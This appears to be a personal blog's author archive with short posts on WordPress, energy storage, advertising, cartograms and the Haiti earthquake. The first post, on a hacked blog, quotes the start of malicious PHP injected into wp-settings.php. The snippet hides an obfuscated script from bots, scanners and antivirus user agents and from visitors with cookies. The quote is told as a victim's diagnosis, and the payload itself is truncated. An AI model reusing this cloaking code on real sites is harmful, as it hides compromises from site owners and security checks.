Author Archives: bhyde

Argh, Blog Hacked

6 Replies

This blog uses WordPress plus a very few plugins.  That’s built on PHP.  So, it’s just asking for trouble.

Today one of my many fans, i.e. my wife, noted that my RSS feed wasn’t working.  I’m a professional, so I provided the Guild’s standard response: “Works for me.”  Actually it wasn’t working for the desktop blog reading software she uses, while it was working for my desktop blog reader.  Finally run the RSS validator on it which announces there is a <script> tag in the feed.  Eh, what!  I don’t see that doing view source in my browser.  Hm.

Finally I pull the feed with curl and that version has the problem.  Prepended on the RSS feed is a script that while compressed and obfuscated.  The obfuscation means it’s got lot of unique tokens in it, i.e. CeHxprJ, lJeVYuCF, UYwXC, and google finds a copy of the script here: http://pastebay.com/82974  but, that link has disappeared, presumably because that paste bot has a setting that will discard postings after 24 hours.

The infection in my blog was in wp-settings.php.  A second <php> block had been inserted at the front of the file.  That injected the script into every page, not just the RSS feed.  Here’s the start of that code.  As you can see it isn’t injected into every page; only certain browsers and then only if there aren’t any cookies yet.  That explains why I didn’t see it in my browser and I assume how “generous in what they accept” RSS readers explains why which people were getting my posts.

<?php
@ob_start();
@error_reporting(0);
if(!preg_match('/googlebot|bot|yahoo|slurp|msnbot|slurp|spider|malware|virus|checker|baidu|wordpress|verifier|robot|scanner|nutch|antivir|mcafee|zeus|tracker|abuse|blacklist|zeus|norton/i', $_SERVER['HTTP_USER_AGENT']) && strlen($_SERVER['HTTP_USER_AGENT'])>5 && sizeof($_COOKIE)==0) {
print "<script>function CeHxprJ(){if (navigator.userAgent.indexOf(\"MSIE\")>0) return document.body.clientWidth*document.body.clientHeight;else return window.outerWidth*window.outerHeight;}if(CeHxprJ()>100000){function anrLazGcj(tLJVMwsZte){ alert('lJeVYuCF'); }  etc


I removed it.  All the rest of the php files had md5 checksums that match the distribution of wordpress 2.9.1.  Of course I am, presumably, still  vulnerable  to what ever infected the blog to begin with.

Bleck.

Postie

2 Replies
I’m inordinately happy to  have finally puzzled out how to enable posting to my blog via email.  The last few times I’d tried to get this to work something or another ruined my fun.

WordPress tempts you into thinking that you can post by email.  But the built in mechanism is flawed in enough ways to make it dead to me.  E.g. –  can only handle simple mail formats, it can only hand unencrypted POP3, and finally didn’t work at all.

But, happy day the  wordpress plugin Postie works for me.

It’s a bit complex to get all the toggles set right.  For example I rarely send email in rich text format, but in this case it’s worth it since the converter will handle all the formating.  Including images.  Floating images!

WordPress tries hard, but the image editing is really too tedious, and its editor is fine; but not as good as the one in my mail program.  And, my mail program there has grammar checking.

Getting all the settings right is delicate.  By default you need to email from the same account you WordPress user id is associated with.  And, you may need to change the email address associated with your admin account for that to work; since I assume it picks the first account it finds.  You will want to check that your blog knows what time zone it’s in, that’s on the general WordPress settings page.  There is also a setting in Postie, but fix the blog’s setting first.  It helped to toggle the “preferred text type” in the postie message settings to “html.”  And you’ll need yet another email account.

Initially I had all the email originated postings filed under “drafts,” and I recommend that until you think you have all the bugs worked out.  But, I’m somewhat sad admit, I still fiddle with the final result by hand.  In particular it isn’t quite getting the paragraph breaks right.

Daily Energy Storage

4 Replies

The drawing at right is the schematic of an air conditioner based on phase change.  In this case wax that melts at 22C (72F).  The wax is encapsulated in tiny spheres and then mixed with water to create a fluid.  That slurry is pumped thru the radiator (labeled: cool-phase condensing rods).

At night cool outside air is used to solidify the wax, and during the day inside air is cooled by melting the wax.  This is analogous to how I cool my house; cooling it at night and sealing it up during the day.  I let the building provide the thermal mass.

They claim you can use it to store heat over night, but I assume that’s only going to work if you warm the house over 72F during the day.  But maybe the slurry is a mixture of wax for different temps.

They can store about 4kWh of energy the slurry.  That’s not a lot as air conditioning loads go (a medium sized room?); but they claim the capital cost per cubic meter and much lower operating costs.

The manufacture is currently testing units around London.  The box looks like a clunky old steam radiator.

So, interesting that a daily cycle, room sized, phase change scheme might show up in the market soon.  There are daily cycle, office building, phase change schemes where in a block of ice is frozen each night.  I’ve thought it would be a hoot to build something similar that was yearly cycle, and house sized.  More here.

Notarized Public Revealing

Leave a reply

I don’t really do Facebook, but back when it first emerged I wrote a few apps and kicked the tires a bit.  One application that I admired, but which is sadly now dormant, was “Awareness Ribbons”.  It let you plop a block into your profile with ribbons for all your assorted causes.  They had hundreds of different ribbons.  I find this kind of public revealing of affiliations fascinating.  In particular I found the idea of a middleman being involved interesting.

Anybody can assert that they are concerned about Feral Cats or what ever your ribbon might signal.  The cost of membership is zero, so the quality of the signal is hard to assert.  Around town I see a lot of people sporting the ring they bought late in their senior year at Harvard or MIT.  I sometimes thought it would be fun if I could pick up a few such rings in pawn shops.
In some imaginary future we will have digital documents that we can present to assert membership in various clubs.  These will be signed by the club, making them a bit harder to forge.  Standards for that are, of course, a substitute for a middleman.  Or maybe we will just get a middleman instead; a commercial notary public.
So it was with interest that I notice  something that Tumbler is doing something along these lines.  Tumbler users can make a donation to one of a few charities, and in return they get a ribbon added to their avatar.  It appears you could just upload an avatar to which you have added your own ribbon, but that’s easy to fix.
Clearly the old Facebook app could be reborn with this added feature.  You only get to display the ribbon of your cause after you donate something thru the application.  The middleman could then work with the clubs to set the terms for that.  In fact any of these social sites that aid the public revealing of self could include features along these lines.

Is advertising spend as skewed as income?

Leave a reply

We know how skewed the distribution of wealth and income are. But I suspect that if you had data about the flux of advertising dollars you would discover that those dollars are targeted disproportionately at tail of the distribution.

I gather that it is well known that if you look at the ads in a given newspaper of magazine the ads are targeted toward the high end of their readership. Hence the ads for thousand dollar watches in the New York Times.

Possibly selling into the high end of the distribution is so lucrative that you don’t really use advertising as most of us think of it. The selling channels are different; you give talks at Ted and get booth space at the superbowl.

Which makes me wonder how different the ads are if my IP address is in 10028 (Upper East Side of Manhattan, avg income $227K/year) v.s. 10454 (South Bronx, avg. income $18K/year).  There must be advertisers who have figured that out.

Buying in Bulk

Leave a reply

I gather that my mother in law once bought a case of dog food only to have the dog die.  We recently bought a big bag of bird seed and now the birds have disappeared.

I was watching a talk about “grit”, which I think the rest of us would call perseverance.  And the speaker was explaining the usual story about how it takes 10 thousand hours of dedicated practice to become an expert in something.  It’s hard to find anything in computing that’s lasted ten years.  There are somethings.  Those guys really don’t fit in.

World Mapper

Leave a reply

I continue to be a fan of the cartograms at world mapper.  And I see they now have regional and national maps.  For example here is one where the grid squares are proportional to the  population across the Caribbean.

And another for  population in the US.

(with luck this will be the first posting done via the  Postie plugin for WordPress, which pulls email (rich text in this case) via inserts it into your drafts, published, or whatever.  You can grab a free email from one of these services, just be careful to get one with imap or pop3 support.)

Haiti

Leave a reply

This map shows the risk of earthquakes for areas in the  Caribbean.

And this is the same map showing Haiti more closely

And this map shows where the first earthquake struck, and the following map shows one of the aftershocks.  The capital city Port-a-Prince is labeled on the second map.

Those are ‘shake maps’, estimates of how severe the shaking was.  The dark red is ten, or X, and here’s what the key says:

VIII - Drivers have trouble steering. Tall structures such as towers,
monuments and chimneys may twist and fall. Wood frame houses that
are not bolted to their foundations may shift and sustain serious
damage.  Damage is slight to moderate in well-constructed buildings,
considerable in poorly constructed buildings. Branches are broken and
fall from trees.  Changes occur in flow or temperature of springs and
wells. Cracks appear in wet ground and on steep slopes. 

IX - Masonry structures and poorly constructed buildings suffer serious
damage or collapse. Frame structures, if not bolted, shift off
foundations. Serious damage to reservoirs.  Underground pipes broken.
Conspicuous cracks in the  ground. In alluvial areas, sand and mud
ejected and sand craters are formed.

X - Most masonry and frame structures destroyed along with their
foundations.  Some well-built wooden structures and bridges are
destroyed.  Serious damage to dams, dikes, and embankments. Large
landslides occur.  Water thrown on the banks of canals, rivers and
lakes.  Sand and mud shift horizontally on beaches and flat land.
Rails bent.

Those mountains are huge, four thousand feet.  So the population is more densely packed than this map suggests.

You can see there is an extremely densely populated valley crossing the peninsula very close to the epicenter of the first quake.  But that doesn’t really agree with this population map, which I tend to trust more since they care more about how population is actually distributed.

The contour lines, in blue, on this map, are at thousand foot intervals.

Ok, here is a profesional effort to estimate the population exposure.  Click here to see the map.

As usual the Globe’s Big Picture has excellent coverage.

Shortly after Katrina NOAA took detailed arial photographs of the entire gulf coastline and put them up on the web.  Does anybody knows of a similar effort for Haiti?